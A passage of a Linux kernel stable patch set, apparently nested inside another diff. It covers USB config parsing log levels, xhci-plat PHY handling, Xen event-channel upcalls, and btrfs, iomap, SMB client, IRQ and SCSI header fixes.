+ 				"bulk endpoint 0x%X has invalid maxpacket %d\n",
+ 				cfgno, inum, asnum, d->bEndpointAddress,
+ 				maxp);
+@@ -533,7 +533,7 @@ static int usb_parse_interface(struct device *ddev, int cfgno,
+ 	      i < intfc->num_altsetting;
+ 	     (++i, ++alt)) {
+ 		if (alt->desc.bAlternateSetting == asnum) {
+-			dev_warn(ddev, "Duplicate descriptor for config %d "
++			dev_notice(ddev, "Duplicate descriptor for config %d "
+ 			    "interface %d altsetting %d, skipping\n",
+ 			    cfgno, inum, asnum);
+ 			goto skip_to_next_interface_descriptor;
+@@ -559,7 +559,7 @@ static int usb_parse_interface(struct device *ddev, int cfgno,
+ 	num_ep = num_ep_orig = alt->desc.bNumEndpoints;
+ 	alt->desc.bNumEndpoints = 0;		/* Use as a counter */
+ 	if (num_ep > USB_MAXENDPOINTS) {
+-		dev_warn(ddev, "too many endpoints for config %d interface %d "
++		dev_notice(ddev, "too many endpoints for config %d interface %d "
+ 		    "altsetting %d: %d, using maximum allowed: %d\n",
+ 		    cfgno, inum, asnum, num_ep, USB_MAXENDPOINTS);
+ 		num_ep = USB_MAXENDPOINTS;
+@@ -590,7 +590,7 @@ static int usb_parse_interface(struct device *ddev, int cfgno,
+ 	}
+ 
+ 	if (n != num_ep_orig)
+-		dev_warn(ddev, "config %d interface %d altsetting %d has %d "
++		dev_notice(ddev, "config %d interface %d altsetting %d has %d "
+ 		    "endpoint descriptor%s, different from the interface "
+ 		    "descriptor's value: %d\n",
+ 		    cfgno, inum, asnum, n, plural(n), num_ep_orig);
+@@ -625,7 +625,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	if (config->desc.bDescriptorType != USB_DT_CONFIG ||
+ 	    config->desc.bLength < USB_DT_CONFIG_SIZE ||
+ 	    config->desc.bLength > size) {
+-		dev_err(ddev, "invalid descriptor for config index %d: "
++		dev_notice(ddev, "invalid descriptor for config index %d: "
+ 		    "type = 0x%X, length = %d\n", cfgidx,
+ 		    config->desc.bDescriptorType, config->desc.bLength);
+ 		return -EINVAL;
+@@ -636,7 +636,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	size -= config->desc.bLength;
+ 
+ 	if (nintf > USB_MAXINTERFACES) {
+-		dev_warn(ddev, "config %d has too many interfaces: %d, "
++		dev_notice(ddev, "config %d has too many interfaces: %d, "
+ 		    "using maximum allowed: %d\n",
+ 		    cfgno, nintf, USB_MAXINTERFACES);
+ 		nintf = USB_MAXINTERFACES;
+@@ -650,7 +650,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	     (buffer2 += header->bLength, size2 -= header->bLength)) {
+ 
+ 		if (size2 < sizeof(struct usb_descriptor_header)) {
+-			dev_warn(ddev, "config %d descriptor has %d excess "
++			dev_notice(ddev, "config %d descriptor has %d excess "
+ 			    "byte%s, ignoring\n",
+ 			    cfgno, size2, plural(size2));
+ 			break;
+@@ -658,7 +658,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 		header = (struct usb_descriptor_header *) buffer2;
+ 		if ((header->bLength > size2) || (header->bLength < 2)) {
+-			dev_warn(ddev, "config %d has an invalid descriptor "
++			dev_notice(ddev, "config %d has an invalid descriptor "
+ 			    "of length %d, skipping remainder of the config\n",
+ 			    cfgno, header->bLength);
+ 			break;
+@@ -670,7 +670,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 			d = (struct usb_interface_descriptor *) header;
+ 			if (d->bLength < USB_DT_INTERFACE_SIZE) {
+-				dev_warn(ddev, "config %d has an invalid "
++				dev_notice(ddev, "config %d has an invalid "
+ 				    "interface descriptor of length %d, "
+ 				    "skipping\n", cfgno, d->bLength);
+ 				continue;
+@@ -680,7 +680,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 			if ((dev->quirks & USB_QUIRK_HONOR_BNUMINTERFACES) &&
+ 			    n >= nintf_orig) {
+-				dev_warn(ddev, "config %d has more interface "
++				dev_notice(ddev, "config %d has more interface "
+ 				    "descriptors, than it declares in "
+ 				    "bNumInterfaces, ignoring interface "
+ 				    "number: %d\n", cfgno, inum);
+@@ -688,7 +688,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 			}
+ 
+ 			if (inum >= nintf_orig)
+-				dev_warn(ddev, "config %d has an invalid "
++				dev_notice(ddev, "config %d has an invalid "
+ 				    "interface number: %d but max is %d\n",
+ 				    cfgno, inum, nintf_orig - 1);
+ 
+@@ -713,14 +713,14 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 			d = (struct usb_interface_assoc_descriptor *)header;
+ 			if (d->bLength < USB_DT_INTERFACE_ASSOCIATION_SIZE) {
+-				dev_warn(ddev,
++				dev_notice(ddev,
+ 					 "config %d has an invalid interface association descriptor of length %d, skipping\n",
+ 					 cfgno, d->bLength);
+ 				continue;
+ 			}
+ 
+ 			if (iad_num == USB_MAXIADS) {
+-				dev_warn(ddev, "found more Interface "
++				dev_notice(ddev, "found more Interface "
+ 					       "Association Descriptors "
+ 					       "than allocated for in "
+ 					       "configuration %d\n", cfgno);
+@@ -731,7 +731,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 		} else if (header->bDescriptorType == USB_DT_DEVICE ||
+ 			    header->bDescriptorType == USB_DT_CONFIG)
+-			dev_warn(ddev, "config %d contains an unexpected "
++			dev_notice(ddev, "config %d contains an unexpected "
+ 			    "descriptor of type 0x%X, skipping\n",
+ 			    cfgno, header->bDescriptorType);
+ 
+@@ -740,11 +740,11 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	config->desc.wTotalLength = cpu_to_le16(buffer2 - buffer0);
+ 
+ 	if (n != nintf)
+-		dev_warn(ddev, "config %d has %d interface%s, different from "
++		dev_notice(ddev, "config %d has %d interface%s, different from "
+ 		    "the descriptor's value: %d\n",
+ 		    cfgno, n, plural(n), nintf_orig);
+ 	else if (n == 0)
+-		dev_warn(ddev, "config %d has no interfaces?\n", cfgno);
++		dev_notice(ddev, "config %d has no interfaces?\n", cfgno);
+ 	config->desc.bNumInterfaces = nintf = n;
+ 
+ 	/* Check for missing interface numbers */
+@@ -754,7 +754,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 				break;
+ 		}
+ 		if (j >= nintf)
+-			dev_warn(ddev, "config %d has no interface number "
++			dev_notice(ddev, "config %d has no interface number "
+ 			    "%d\n", cfgno, i);
+ 	}
+ 
+@@ -762,7 +762,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	for (i = 0; i < nintf; ++i) {
+ 		j = nalts[i];
+ 		if (j > USB_MAXALTSETTING) {
+-			dev_warn(ddev, "too many alternate settings for "
++			dev_notice(ddev, "too many alternate settings for "
+ 			    "config %d interface %d: %d, "
+ 			    "using maximum allowed: %d\n",
+ 			    cfgno, inums[i], j, USB_MAXALTSETTING);
+@@ -811,7 +811,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 					break;
+ 			}
+ 			if (n >= intfc->num_altsetting)
+-				dev_warn(ddev, "config %d interface %d has no "
++				dev_notice(ddev, "config %d interface %d has no "
+ 				    "altsetting %d\n", cfgno, inums[i], j);
+ 		}
+ 	}
+@@ -868,7 +868,7 @@ int usb_get_configuration(struct usb_device *dev)
+ 	int result;
+ 
+ 	if (ncfg > USB_MAXCONFIG) {
+-		dev_warn(ddev, "too many configurations: %d, "
++		dev_notice(ddev, "too many configurations: %d, "
+ 		    "using maximum allowed: %d\n", ncfg, USB_MAXCONFIG);
+ 		dev->descriptor.bNumConfigurations = ncfg = USB_MAXCONFIG;
+ 	}
+@@ -902,7 +902,7 @@ int usb_get_configuration(struct usb_device *dev)
+ 			    "descriptor/%s: %d\n", cfgno, "start", result);
+ 			if (result != -EPIPE)
+ 				goto err;
+-			dev_err(ddev, "chopping to %d config(s)\n", cfgno);
++			dev_notice(ddev, "chopping to %d config(s)\n", cfgno);
+ 			dev->descriptor.bNumConfigurations = cfgno;
+ 			break;
+ 		} else if (result < 4) {
+@@ -934,7 +934,7 @@ int usb_get_configuration(struct usb_device *dev)
+ 			goto err;
+ 		}
+ 		if (result < length) {
+-			dev_warn(ddev, "config index %d descriptor too short "
++			dev_notice(ddev, "config index %d descriptor too short "
+ 			    "(expected %i, got %i)\n", cfgno, length, result);
+ 			length = result;
+ 		}
+@@ -993,7 +993,7 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 	/* Get BOS descriptor */
+ 	ret = usb_get_descriptor(dev, USB_DT_BOS, 0, bos, USB_DT_BOS_SIZE);
+ 	if (ret < USB_DT_BOS_SIZE || bos->bLength < USB_DT_BOS_SIZE) {
+-		dev_err(ddev, "unable to get BOS descriptor or descriptor too short\n");
++		dev_notice(ddev, "unable to get BOS descriptor or descriptor too short\n");
+ 		if (ret >= 0)
+ 			ret = -ENOMSG;
+ 		kfree(bos);
+@@ -1021,7 +1021,7 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 
+ 	ret = usb_get_descriptor(dev, USB_DT_BOS, 0, buffer, total_len);
+ 	if (ret < total_len) {
+-		dev_err(ddev, "unable to get BOS descriptor set\n");
++		dev_notice(ddev, "unable to get BOS descriptor set\n");
+ 		if (ret >= 0)
+ 			ret = -ENOMSG;
+ 		goto err;
+@@ -1046,8 +1046,8 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 		}
+ 
+ 		if (cap->bDescriptorType != USB_DT_DEVICE_CAPABILITY) {
+-			dev_warn(ddev, "descriptor type invalid, skip\n");
+-			continue;
++			dev_notice(ddev, "descriptor type invalid, skip\n");
++			goto skip_to_next_descriptor;
+ 		}
+ 
+ 		switch (cap_type) {
+@@ -1081,6 +1081,7 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 			break;
+ 		}
+ 
++skip_to_next_descriptor:
+ 		total_len -= length;
+ 		buffer += length;
+ 	}
+diff --git a/drivers/usb/host/xhci-plat.c b/drivers/usb/host/xhci-plat.c
+index c9a101f0e8d01..c9438dc56f5fc 100644
+--- a/drivers/usb/host/xhci-plat.c
++++ b/drivers/usb/host/xhci-plat.c
+@@ -184,7 +184,7 @@ static int xhci_plat_probe(struct platform_device *pdev)
+ 	int			ret;
+ 	int			irq;
+ 	struct xhci_plat_priv	*priv = NULL;
+-
++	bool			of_match;
+ 
+ 	if (usb_disabled())
+ 		return -ENODEV;
+@@ -305,16 +305,23 @@ static int xhci_plat_probe(struct platform_device *pdev)
+ 					 &xhci->imod_interval);
+ 	}
+ 
+-	hcd->usb_phy = devm_usb_get_phy_by_phandle(sysdev, "usb-phy", 0);
+-	if (IS_ERR(hcd->usb_phy)) {
+-		ret = PTR_ERR(hcd->usb_phy);
+-		if (ret == -EPROBE_DEFER)
+-			goto disable_clk;
+-		hcd->usb_phy = NULL;
+-	} else {
+-		ret = usb_phy_init(hcd->usb_phy);
+-		if (ret)
+-			goto disable_clk;
++	/*
++	 * Drivers such as dwc3 manages PHYs themself (and rely on driver name
++	 * matching for the xhci platform device).
++	 */
++	of_match = of_match_device(pdev->dev.driver->of_match_table, &pdev->dev);
++	if (of_match) {
++		hcd->usb_phy = devm_usb_get_phy_by_phandle(sysdev, "usb-phy", 0);
++		if (IS_ERR(hcd->usb_phy)) {
++			ret = PTR_ERR(hcd->usb_phy);
++			if (ret == -EPROBE_DEFER)
++				goto disable_clk;
++			hcd->usb_phy = NULL;
++		} else {
++			ret = usb_phy_init(hcd->usb_phy);
++			if (ret)
++				goto disable_clk;
++		}
+ 	}
+ 
+ 	hcd->tpl_support = of_usb_host_tpl_support(sysdev->of_node);
+diff --git a/drivers/video/fbdev/sticore.h b/drivers/video/fbdev/sticore.h
+index 0ebdd28a0b813..d83ab3ded5f3d 100644
+--- a/drivers/video/fbdev/sticore.h
++++ b/drivers/video/fbdev/sticore.h
+@@ -231,7 +231,7 @@ struct sti_rom_font {
+ 	 u8 height;
+ 	 u8 font_type;		/* language type */
+ 	 u8 bytes_per_char;
+-	u32 next_font;
++	s32 next_font;		/* note: signed int */
+ 	 u8 underline_height;
+ 	 u8 underline_pos;
+ 	 u8 res008[2];
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index af9115d648092..00f8e349921d4 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -1710,9 +1710,10 @@ void handle_irq_for_port(evtchn_port_t port, struct evtchn_loop_ctrl *ctrl)
+ 	generic_handle_irq(irq);
+ }
+ 
+-static void __xen_evtchn_do_upcall(void)
++int xen_evtchn_do_upcall(void)
+ {
+ 	struct vcpu_info *vcpu_info = __this_cpu_read(xen_vcpu);
++	int ret = vcpu_info->evtchn_upcall_pending ? IRQ_HANDLED : IRQ_NONE;
+ 	int cpu = smp_processor_id();
+ 	struct evtchn_loop_ctrl ctrl = { 0 };
+ 
+@@ -1744,25 +1745,10 @@ static void __xen_evtchn_do_upcall(void)
+ 	 * above.
+ 	 */
+ 	__this_cpu_inc(irq_epoch);
+-}
+-
+-void xen_evtchn_do_upcall(struct pt_regs *regs)
+-{
+-	struct pt_regs *old_regs = set_irq_regs(regs);
+-
+-	irq_enter();
+-
+-	__xen_evtchn_do_upcall();
+ 
+-	irq_exit();
+-	set_irq_regs(old_regs);
+-}
+-
+-void xen_hvm_evtchn_do_upcall(void)
+-{
+-	__xen_evtchn_do_upcall();
++	return ret;
+ }
+-EXPORT_SYMBOL_GPL(xen_hvm_evtchn_do_upcall);
++EXPORT_SYMBOL_GPL(xen_evtchn_do_upcall);
+ 
+ /* Rebind a new event channel to an existing irq. */
+ void rebind_evtchn_irq(evtchn_port_t evtchn, int irq)
+diff --git a/drivers/xen/platform-pci.c b/drivers/xen/platform-pci.c
+index cd07e3fed0faf..544d3f9010b92 100644
+--- a/drivers/xen/platform-pci.c
++++ b/drivers/xen/platform-pci.c
+@@ -64,14 +64,13 @@ static uint64_t get_callback_via(struct pci_dev *pdev)
+ 
+ static irqreturn_t do_hvm_evtchn_intr(int irq, void *dev_id)
+ {
+-	xen_hvm_evtchn_do_upcall();
+-	return IRQ_HANDLED;
++	return xen_evtchn_do_upcall();
+ }
+ 
+ static int xen_allocate_irq(struct pci_dev *pdev)
+ {
+ 	return request_irq(pdev->irq, do_hvm_evtchn_intr,
+-			IRQF_NOBALANCING | IRQF_TRIGGER_RISING,
++			IRQF_NOBALANCING | IRQF_SHARED,
+ 			"xen-platform-pci", pdev);
+ }
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index d1dae29a3d012..40152458e7b74 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3493,6 +3493,7 @@ int __cold open_ctree(struct super_block *sb, struct btrfs_fs_devices *fs_device
+ 		goto fail_alloc;
+ 	}
+ 
++	btrfs_info(fs_info, "first mount of filesystem %pU", disk_super->fsid);
+ 	/*
+ 	 * Verify the type first, if that or the checksum value are
+ 	 * corrupted, we'll find out
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index e015e1e025b6e..dc6e3cce747c1 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -5236,6 +5236,7 @@ static int _btrfs_ioctl_send(struct inode *inode, void __user *argp, bool compat
+ 		arg->clone_sources = compat_ptr(args32.clone_sources);
+ 		arg->parent_root = args32.parent_root;
+ 		arg->flags = args32.flags;
++		arg->version = args32.version;
+ 		memcpy(arg->reserved, args32.reserved,
+ 		       sizeof(args32.reserved));
+ #else
+diff --git a/fs/btrfs/ref-verify.c b/fs/btrfs/ref-verify.c
+index a248f46cfe728..4b052d4009d31 100644
+--- a/fs/btrfs/ref-verify.c
++++ b/fs/btrfs/ref-verify.c
+@@ -788,6 +788,7 @@ int btrfs_ref_tree_mod(struct btrfs_fs_info *fs_info,
+ 			dump_ref_action(fs_info, ra);
+ 			kfree(ref);
+ 			kfree(ra);
++			kfree(re);
+ 			goto out_unlock;
+ 		} else if (be->num_refs == 0) {
+ 			btrfs_err(fs_info,
+@@ -797,6 +798,7 @@ int btrfs_ref_tree_mod(struct btrfs_fs_info *fs_info,
+ 			dump_ref_action(fs_info, ra);
+ 			kfree(ref);
+ 			kfree(ra);
++			kfree(re);
+ 			goto out_unlock;
+ 		}
+ 
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 547b5c2292186..4a4d65b5e24f7 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7885,7 +7885,7 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	}
+ 
+ 	sctx->send_filp = fget(arg->send_fd);
+-	if (!sctx->send_filp) {
++	if (!sctx->send_filp || !(sctx->send_filp->f_mode & FMODE_WRITE)) {
+ 		ret = -EBADF;
+ 		goto out;
+ 	}
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 2c562febd801e..6fc5fa18d1ee6 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -391,7 +391,10 @@ void __btrfs_panic(struct btrfs_fs_info *fs_info, const char *function,
+ 
+ static void btrfs_put_super(struct super_block *sb)
+ {
+-	close_ctree(btrfs_sb(sb));
++	struct btrfs_fs_info *fs_info = btrfs_sb(sb);
++
++	btrfs_info(fs_info, "last unmount of filesystem %pU", fs_info->fs_devices->fsid);
++	close_ctree(fs_info);
+ }
+ 
+ enum {
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index e62b4c139a72d..6fc2d99270c18 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -3074,15 +3074,16 @@ struct extent_map *btrfs_get_chunk_map(struct btrfs_fs_info *fs_info,
+ 	read_unlock(&em_tree->lock);
+ 
+ 	if (!em) {
+-		btrfs_crit(fs_info, "unable to find logical %llu length %llu",
++		btrfs_crit(fs_info,
++			   "unable to find chunk map for logical %llu length %llu",
+ 			   logical, length);
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
+-	if (em->start > logical || em->start + em->len < logical) {
++	if (em->start > logical || em->start + em->len <= logical) {
+ 		btrfs_crit(fs_info,
+-			   "found a bad mapping, wanted %llu-%llu, found %llu-%llu",
+-			   logical, length, em->start, em->start + em->len);
++			   "found a bad chunk map, wanted %llu-%llu, found %llu-%llu",
++			   logical, logical + length, em->start, em->start + em->len);
+ 		free_extent_map(em);
+ 		return ERR_PTR(-EINVAL);
+ 	}
+diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
+index 4eb559a16c9ed..105c4a1d20a20 100644
+--- a/fs/iomap/direct-io.c
++++ b/fs/iomap/direct-io.c
+@@ -94,7 +94,6 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
+ 		if (offset + ret > dio->i_size &&
+ 		    !(dio->flags & IOMAP_DIO_WRITE))
+ 			ret = dio->i_size - offset;
+-		iocb->ki_pos += ret;
+ 	}
+ 
+ 	/*
+@@ -120,18 +119,19 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
+ 	}
+ 
+ 	inode_dio_end(file_inode(iocb->ki_filp));
+-	/*
+-	 * If this is a DSYNC write, make sure we push it to stable storage now
+-	 * that we've written data.
+-	 */
+-	if (ret > 0 && (dio->flags & IOMAP_DIO_NEED_SYNC))
+-		ret = generic_write_sync(iocb, ret);
+-
+-	if (ret > 0)
+-		ret += dio->done_before;
++	if (ret > 0) {
++		iocb->ki_pos += ret;
+ 
++		/*
++		 * If this is a DSYNC write, make sure we push it to stable
++		 * storage now that we've written data.
++		 */
++		if (dio->flags & IOMAP_DIO_NEED_SYNC)
++			ret = generic_write_sync(iocb, ret);
++		if (ret > 0)
++			ret += dio->done_before;
++	}
+ 	kfree(dio);
+-
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(iomap_dio_complete);
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 05516309ec3ab..7be51f9d2fa18 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -772,6 +772,8 @@ static void cifs_open_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_i
+ 	}
+ 
+ 	if (S_ISLNK(fattr->cf_mode)) {
++		if (likely(data->symlink_target))
++			fattr->cf_eof = strnlen(data->symlink_target, PATH_MAX);
+ 		fattr->cf_symlink_target = data->symlink_target;
+ 		data->symlink_target = NULL;
+ 	}
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 4cc56e4695fbc..e628848a1df93 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -3424,6 +3424,7 @@ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+ 	struct inode *inode = file_inode(file);
+ 	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+ 	struct cifsFileInfo *cfile = file->private_data;
++	unsigned long long new_size;
+ 	long rc;
+ 	unsigned int xid;
+ 	__le64 eof;
+@@ -3454,10 +3455,15 @@ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+ 	/*
+ 	 * do we also need to change the size of the file?
+ 	 */
+-	if (keep_size == false && i_size_read(inode) < offset + len) {
+-		eof = cpu_to_le64(offset + len);
++	new_size = offset + len;
++	if (keep_size == false && (unsigned long long)i_size_read(inode) < new_size) {
++		eof = cpu_to_le64(new_size);
+ 		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+ 				  cfile->fid.volatile_fid, cfile->pid, &eof);
++		if (rc >= 0) {
++			truncate_setsize(inode, new_size);
++			fscache_resize_cookie(cifs_inode_cookie(inode), new_size);
++		}
+ 	}
+ 
+  zero_range_exit:
+@@ -3852,6 +3858,9 @@ static long smb3_insert_range(struct file *file, struct cifs_tcon *tcon,
+ 	if (rc < 0)
+ 		goto out_2;
+ 
++	truncate_setsize(inode, old_eof + len);
++	fscache_resize_cookie(cifs_inode_cookie(inode), i_size_read(inode));
++
+ 	rc = smb2_copychunk_range(xid, cfile, cfile, off, count, off + len);
+ 	if (rc < 0)
+ 		goto out_2;
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index 3dfb994312b1f..b79097b9070b3 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -478,6 +478,21 @@ static inline bool dma_fence_is_later(struct dma_fence *f1,
+ 	return __dma_fence_is_later(f1->seqno, f2->seqno, f1->ops);
+ }
+ 
++/**
++ * dma_fence_is_later_or_same - return true if f1 is later or same as f2
++ * @f1: the first fence from the same context
++ * @f2: the second fence from the same context
++ *
++ * Returns true if f1 is chronologically later than f2 or the same fence. Both
++ * fences must be from the same context, since a seqno is not re-used across
++ * contexts.
++ */
++static inline bool dma_fence_is_later_or_same(struct dma_fence *f1,
++					      struct dma_fence *f2)
++{
++	return f1 == f2 || dma_fence_is_later(f1, f2);
++}
++
+ /**
+  * dma_fence_later - return the chronologically later fence
+  * @f1:	the first fence from the same context
+diff --git a/include/linux/irq.h b/include/linux/irq.h
+index c3eb89606c2b1..06c692cc0accb 100644
+--- a/include/linux/irq.h
++++ b/include/linux/irq.h
+@@ -215,8 +215,6 @@ struct irq_data {
+  * IRQD_SINGLE_TARGET		- IRQ allows only a single affinity target
+  * IRQD_DEFAULT_TRIGGER_SET	- Expected trigger already been set
+  * IRQD_CAN_RESERVE		- Can use reservation mode
+- * IRQD_MSI_NOMASK_QUIRK	- Non-maskable MSI quirk for affinity change
+- *				  required
+  * IRQD_HANDLE_ENFORCE_IRQCTX	- Enforce that handle_irq_*() is only invoked
+  *				  from actual interrupt context.
+  * IRQD_AFFINITY_ON_ACTIVATE	- Affinity is set on activation. Don't call
+@@ -245,10 +243,9 @@ enum {
+ 	IRQD_SINGLE_TARGET		= (1 << 24),
+ 	IRQD_DEFAULT_TRIGGER_SET	= (1 << 25),
+ 	IRQD_CAN_RESERVE		= (1 << 26),
+-	IRQD_MSI_NOMASK_QUIRK		= (1 << 27),
+-	IRQD_HANDLE_ENFORCE_IRQCTX	= (1 << 28),
+-	IRQD_AFFINITY_ON_ACTIVATE	= (1 << 29),
+-	IRQD_IRQ_ENABLED_ON_SUSPEND	= (1 << 30),
++	IRQD_HANDLE_ENFORCE_IRQCTX	= (1 << 27),
++	IRQD_AFFINITY_ON_ACTIVATE	= (1 << 28),
++	IRQD_IRQ_ENABLED_ON_SUSPEND	= (1 << 29),
+ };
+ 
+ #define __irqd_to_state(d) ACCESS_PRIVATE((d)->common, state_use_accessors)
+@@ -423,21 +420,6 @@ static inline bool irqd_can_reserve(struct irq_data *d)
+ 	return __irqd_to_state(d) & IRQD_CAN_RESERVE;
+ }
+ 
+-static inline void irqd_set_msi_nomask_quirk(struct irq_data *d)
+-{
+-	__irqd_to_state(d) |= IRQD_MSI_NOMASK_QUIRK;
+-}
+-
+-static inline void irqd_clr_msi_nomask_quirk(struct irq_data *d)
+-{
+-	__irqd_to_state(d) &= ~IRQD_MSI_NOMASK_QUIRK;
+-}
+-
+-static inline bool irqd_msi_nomask_quirk(struct irq_data *d)
+-{
+-	return __irqd_to_state(d) & IRQD_MSI_NOMASK_QUIRK;
+-}
+-
+ static inline void irqd_set_affinity_on_activate(struct irq_data *d)
+ {
+ 	__irqd_to_state(d) |= IRQD_AFFINITY_ON_ACTIVATE;
+diff --git a/include/linux/mmc/host.h b/include/linux/mmc/host.h
+index 8fdd3cf971a30..8f918f9a1228d 100644
+--- a/include/linux/mmc/host.h
++++ b/include/linux/mmc/host.h
+@@ -450,6 +450,7 @@ struct mmc_host {
+ 	unsigned int		retune_paused:1; /* re-tuning is temporarily disabled */
+ 	unsigned int		retune_crc_disable:1; /* don't trigger retune upon crc */
+ 	unsigned int		can_dma_map_merge:1; /* merging can be used */
++	unsigned int		vqmmc_enabled:1; /* vqmmc regulator is enabled */
+ 
+ 	int			rescan_disable;	/* disable card detection */
+ 	int			rescan_entered;	/* used with nonremovable devices */
+@@ -597,6 +598,8 @@ static inline int mmc_regulator_set_vqmmc(struct mmc_host *mmc,
+ #endif
+ 
+ int mmc_regulator_get_supply(struct mmc_host *mmc);
++int mmc_regulator_enable_vqmmc(struct mmc_host *mmc);
++void mmc_regulator_disable_vqmmc(struct mmc_host *mmc);
+ 
+ static inline int mmc_card_is_removable(struct mmc_host *host)
+ {
+diff --git a/include/linux/spi/spi.h b/include/linux/spi/spi.h
+index fbf8c0d95968e..877395e075afe 100644
+--- a/include/linux/spi/spi.h
++++ b/include/linux/spi/spi.h
+@@ -531,6 +531,7 @@ struct spi_controller {
+ #define SPI_CONTROLLER_MUST_TX		BIT(4)	/* Requires tx */
+ 
+ #define SPI_MASTER_GPIO_SS		BIT(5)	/* GPIO CS must select slave */
++#define SPI_CONTROLLER_SUSPENDED	BIT(6)	/* Currently suspended */
+ 
+ 	/* Flag indicating if the allocation of this struct is devres-managed */
+ 	bool			devm_allocated;
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index 5aabc36fb249b..fdc31fdb612da 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -167,19 +167,25 @@ struct scsi_device {
+ 	 * power state for system suspend/resume (suspend to RAM and
+ 	 * hibernation) operations.
+ 	 */
+-	bool manage_system_start_stop;
++	unsigned manage_system_start_stop:1;
+ 
+ 	/*
+ 	 * If true, let the high-level device driver (sd) manage the device
+ 	 * power state for runtime device suspand and resume operations.
+ 	 */
+-	bool manage_runtime_start_stop;
++	unsigned manage_runtime_start_stop:1;
+ 
+ 	/*
+ 	 * If true, let the high-level device driver (sd) manage the device
+ 	 * power state for system shutdown (power off) operations.
+ 	 */
+-	bool manage_shutdown;
++	unsigned manage_shutdown:1;
++
++	/*
++	 * If set and if the device is runtime suspended, ask the high-level
++	 * device driver (sd) to force a runtime resume of the device.
++	 */
++	unsigned force_runtime_start_on_system_start:1;
+ 
+ 	unsigned removable:1;
+ 	unsigned changed:1;	/* Data invalid due to media change */
+diff --git a/include/uapi/linux/stddef.h b/include/uapi/linux/stddef.h
+index 7837ba4fe7289..dcd50fb2164a1 100644
+--- a/include/uapi/linux/stddef.h
++++ b/include/uapi/linux/stddef.h
+@@ -27,7 +27,7 @@
+ 	union { \
+ 		struct { MEMBERS } ATTRS; \
+ 		struct TAG { MEMBERS } ATTRS NAME; \
+-	}
++	} ATTRS
+ 
+ /**
+  * __DECLARE_FLEX_ARRAY() - Declare a flexible array usable in a union
+diff --git a/include/xen/events.h b/include/xen/events.h
+index 344081e71584b..b303bd24e2a6c 100644
+--- a/include/xen/events.h
++++ b/include/xen/events.h
+@@ -106,8 +106,7 @@ int irq_from_virq(unsigned int cpu, unsigned int virq);
+ evtchn_port_t evtchn_from_irq(unsigned irq);
+ 
+ int xen_set_callback_via(uint64_t via);
+-void xen_evtchn_do_upcall(struct pt_regs *regs);
+-void xen_hvm_evtchn_do_upcall(void);
++int xen_evtchn_do_upcall(void);
+ 
+ /* Bind a pirq for a physical interrupt to an irq. */
+ int xen_bind_pirq_gsi_to_irq(unsigned gsi,
+diff --git a/kernel/irq/debugfs.c b/kernel/irq/debugfs.c
+index bbcaac64038ef..0b78fac882b2b 100644
+--- a/kernel/irq/debugfs.c
++++ b/kernel/irq/debugfs.c
+@@ -121,7 +121,6 @@ static const struct irq_bit_descr irqdata_states[] = {
+ 	BIT_MASK_DESCR(IRQD_AFFINITY_ON_ACTIVATE),
+ 	BIT_MASK_DESCR(IRQD_MANAGED_SHUTDOWN),
+ 	BIT_MASK_DESCR(IRQD_CAN_RESERVE),
